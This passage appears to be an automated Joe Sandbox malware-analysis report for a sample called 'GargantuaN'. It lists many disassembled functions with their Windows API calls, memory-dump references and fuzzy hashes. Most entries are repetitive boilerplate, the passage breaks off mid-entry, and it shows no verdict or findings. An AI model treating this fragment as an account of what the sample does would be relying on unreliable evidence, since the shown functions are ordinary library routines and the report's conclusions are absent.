                                                        Download Yara Rule
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00D79813,00000001,00000364,?,00D73F73,00000050,?,00D91030,00000200), ref: 00D7B177
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 23e5f5d9e1dd439aab6a42273a6a0488803b6313820198d3e18692a23ded228b
                                                        • Instruction ID: dab26534d5681d0bd8b452527228ebf8ca4f34151af2d67937f6e3c18894990f
                                                        • Opcode Fuzzy Hash: 23e5f5d9e1dd439aab6a42273a6a0488803b6313820198d3e18692a23ded228b
                                                        • Instruction Fuzzy Hash: 3BF05432545725ABDB215B25AC2AB5E7748EF41770B9CC213FC0CDB190FB21D90186F0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D73C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00D73C3F
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AddressProc
                                                        • String ID:
                                                        • API String ID: 190572456-0
                                                        • Opcode ID: a9d9b2ef10fb513fc3f94481ce50a3b10afab8449d9cead8da39e55928bec693
                                                        • Instruction ID: 7758f7fb4a68bf819ca386f4187a6ce79ee48660b2d8de5ef759618fd4e175df
                                                        • Opcode Fuzzy Hash: a9d9b2ef10fb513fc3f94481ce50a3b10afab8449d9cead8da39e55928bec693
                                                        • Instruction Fuzzy Hash: E6F0A7322003169F8F125E68EC0099A7799EF01B607248125FA0DE7190FB31DA20E7B0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D78E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D7CA2C,00000000,?,00D76CBE,?,00000008,?,00D791E0,?,?,?), ref: 00D78E38
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 6a0cd2aa39a4aa82b52dd4a7da18cdc5a77fce5fd0a09c4f7676a06fbffae780
                                                        • Instruction ID: aa69100f57a798c40a0a805889fc73dab45f596e365e2228714898d34d9d1eb8
                                                        • Opcode Fuzzy Hash: 6a0cd2aa39a4aa82b52dd4a7da18cdc5a77fce5fd0a09c4f7676a06fbffae780
                                                        • Instruction Fuzzy Hash: E0E06D3268662596EA7226659C0DB9FB648DB417B4F59C121BC5C96191FF22CC00A3F1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D55ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00D55AC2
                                                          • Part of subcall function 00D5B505: __EH_prolog.LIBCMT ref: 00D5B50A
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID:
                                                        • API String ID: 3519838083-0
                                                        • Opcode ID: 1001810da14e339d306ec2473b11804a165370f32d6fa0b16a1757d6769a9341
                                                        • Instruction ID: 1410ee2608b501780a8882dfcbaf1db0ad697a3cf91b24b7a97fdf2ee827b642
                                                        • Opcode Fuzzy Hash: 1001810da14e339d306ec2473b11804a165370f32d6fa0b16a1757d6769a9341
                                                        • Instruction Fuzzy Hash: A1018C30810694DBDB29E7B8C0557EEFBA8DF64304F54848EA85A53282CBB41B08D7B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D59620 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00D595D6,?,?,?,?,?,00D82641,000000FF), ref: 00D5963B
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: ChangeCloseFindNotification
                                                        • String ID:
                                                        • API String ID: 2591292051-0
                                                        • Opcode ID: 14aa285c3c68591ad02ddc60a2b41c6c643ed03ea318499ea7270e76762354e8
                                                        • Instruction ID: b9aa9aab5f4f4bd69360796a7d827d49992159a82b003d4919de746951ab544e
                                                        • Opcode Fuzzy Hash: 14aa285c3c68591ad02ddc60a2b41c6c643ed03ea318499ea7270e76762354e8
                                                        • Instruction Fuzzy Hash: 51F08070481715DFDF304A24C458752F7E85B12322F081B1DDCF6475E0D771558D9760
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D5A56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00D5A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00D5A592,000000FF,?,?), ref: 00D5A6C4
                                                          • Part of subcall function 00D5A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00D5A592,000000FF,?,?), ref: 00D5A6F2
                                                          • Part of subcall function 00D5A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00D5A592,000000FF,?,?), ref: 00D5A6FE
                                                        • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00D5A598
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: Find$FileFirst$CloseErrorLast
                                                        • String ID:
                                                        • API String ID: 1464966427-0
                                                        • Opcode ID: c6cf3f3905a1e9b944ed57bd6e21c514bc8751e5d39444fb9d62fbdcb9eda2c0
                                                        • Instruction ID: d2ced23e7c81abbb02d63a0895643b6d34c90754a4e353588f44ea2897decc1e
                                                        • Opcode Fuzzy Hash: c6cf3f3905a1e9b944ed57bd6e21c514bc8751e5d39444fb9d62fbdcb9eda2c0
                                                        • Instruction Fuzzy Hash: 42F089310087A0AACF2257B84905BDB7B90AF15333F058B49FDFD52196D275509C9B33
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D60E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadExecutionState.KERNEL32(00000001), ref: 00D60E3D
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: ExecutionStateThread
                                                        • String ID:
                                                        • API String ID: 2211380416-0
                                                        • Opcode ID: 32a73730235763dad749d91949bc1fc3d0bdea669a542a8b83bde3c6f778bcc7
                                                        • Instruction ID: a32d7957baddc543c827dd047d1c1e9d9a275721f3266d06e29a77833f66a93d
                                                        • Opcode Fuzzy Hash: 32a73730235763dad749d91949bc1fc3d0bdea669a542a8b83bde3c6f778bcc7
                                                        • Instruction Fuzzy Hash: F1D02B14B1116517DF11372C28197FF2D0ACFD7711F0C0026F84D97383CE46488AA272
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6A626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GdipAlloc.GDIPLUS(00000010), ref: 00D6A62C
                                                          • Part of subcall function 00D6A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00D6A3DA
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: Gdip$AllocBitmapCreateFromStream
                                                        • String ID:
                                                        • API String ID: 1915507550-0
                                                        • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                        • Instruction ID: e84654e7f19a843b94cee8f94cd110668b4be96bf19cd305d61963e29a883845
                                                        • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                        • Instruction Fuzzy Hash: DCD0C77121060977DF416FA9CD12A6E7695EB10344F04C125B8C1E5151EAB1D9109972
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • DloadProtectSection.DELAYIMP ref: 00D6E5E3
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: DloadProtectSection
                                                        • String ID:
                                                        • API String ID: 2203082970-0
                                                        • Opcode ID: 92107a391c2c43ff924d161861fd030ef991b57d6060a4d5a24387fe9735d177
                                                        • Instruction ID: 92c7ced35a5fca36ca74f95dbd671a1c9069910d3baf85f6b4be2f66ad152888
                                                        • Opcode Fuzzy Hash: 92107a391c2c43ff924d161861fd030ef991b57d6060a4d5a24387fe9735d177
                                                        • Instruction Fuzzy Hash: A5D022BC0C0340CFC301EBE8A8627183B50F320700FE40201F147C2292DBA090C2CB3A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6DD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00D61B3E), ref: 00D6DD92
                                                          • Part of subcall function 00D6B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D6B579
                                                          • Part of subcall function 00D6B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D6B58A
                                                          • Part of subcall function 00D6B568: IsDialogMessageW.USER32(0002047E,?), ref: 00D6B59E
                                                          • Part of subcall function 00D6B568: TranslateMessage.USER32(?), ref: 00D6B5AC
                                                          • Part of subcall function 00D6B568: DispatchMessageW.USER32(?), ref: 00D6B5B6
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                        • String ID:
                                                        • API String ID: 897784432-0
                                                        • Opcode ID: c4ef1170f49dc1d629779f54ed5d35c0a86684b4b4a12045fab4e8f0b313cac0
                                                        • Instruction ID: 71321ebc4834f3ce12b880d7fb3787bffaa4a79db47866fbb14896b8f11cabb7
                                                        • Opcode Fuzzy Hash: c4ef1170f49dc1d629779f54ed5d35c0a86684b4b4a12045fab4e8f0b313cac0
                                                        • Instruction Fuzzy Hash: 62D09E31144300BBD6012B51CD06F0F7AA6EF89B04F004555B285B40B1C672AD71EB36
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D598BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileType.KERNELBASE(000000FF,00D597BE), ref: 00D598C8
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        • Opcode ID: 7cf896f020fa96a19e9b63c746cb59b1630e1fc72ef7a8ed781ee7bcd79068be
                                                        • Instruction ID: 8cdde8cecc3f09d20a42aa1940c84c7b864c92c162c151c7a6fea02b471ccdb5
                                                        • Opcode Fuzzy Hash: 7cf896f020fa96a19e9b63c746cb59b1630e1fc72ef7a8ed781ee7bcd79068be
                                                        • Instruction Fuzzy Hash: 81C01234400205C68E308A24986809ABB22AA537A77B88795C828CA0A1C332CC8FEB21
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: b1ea826c082170f754326cdc200d57755d3f81c354cd4cafec2ef91ee8acbcfc
                                                        • Instruction ID: e07bfb588cc83871d28625970db73c2919f56a075e184a1f47030d092e7e18db
                                                        • Opcode Fuzzy Hash: b1ea826c082170f754326cdc200d57755d3f81c354cd4cafec2ef91ee8acbcfc
                                                        • Instruction Fuzzy Hash: 2CB012DD268300FE310461491C12C3B030CC0C2B10330843EFC02C0480D850EC082871
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E1F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 7e31a018d99b338a54d17320b30718c64b27cd628fada68dbba9093666159a78
                                                        • Instruction ID: cb7ecba7894fffb821985b78c007aeaec5f9038c5a5352507af8f74e674408b8
                                                        • Opcode Fuzzy Hash: 7e31a018d99b338a54d17320b30718c64b27cd628fada68dbba9093666159a78
                                                        • Instruction Fuzzy Hash: 9EB012D9268300EE3144A2091C02C37030CC0C2B10330C03EFC0AC1280D850EC0C2A71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E1EC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 124dbce6d6e27cc8a6e3d79ae8011ec96ff10decdde7f7556a2eb2b36cb1e2f8
                                                        • Instruction ID: 96ea81d299fbe6adbe3f63eadd601862f27726dd4417f2e633f50780cc5d4e10
                                                        • Opcode Fuzzy Hash: 124dbce6d6e27cc8a6e3d79ae8011ec96ff10decdde7f7556a2eb2b36cb1e2f8
                                                        • Instruction Fuzzy Hash: 2FB012DD26C300EE3144A14D1C02C3B030CC0C1B10330403EF806C1180D860AC082A71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E282 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 6cda4e1fa78e0cc86403ee76f9d3d18e61d2a6e015aee8a852781774236f65a4
                                                        • Instruction ID: aeafc1b64ce7b944e5bf0acfe948e85d44e8f7cb2dcb00244d8faa67b34eaca4
                                                        • Opcode Fuzzy Hash: 6cda4e1fa78e0cc86403ee76f9d3d18e61d2a6e015aee8a852781774236f65a4
                                                        • Instruction Fuzzy Hash: 3DB012E92A8200EE3144A1091D02C37038CC0C1B10330403EF806C1180DC50AD092971
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E250 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        APIs
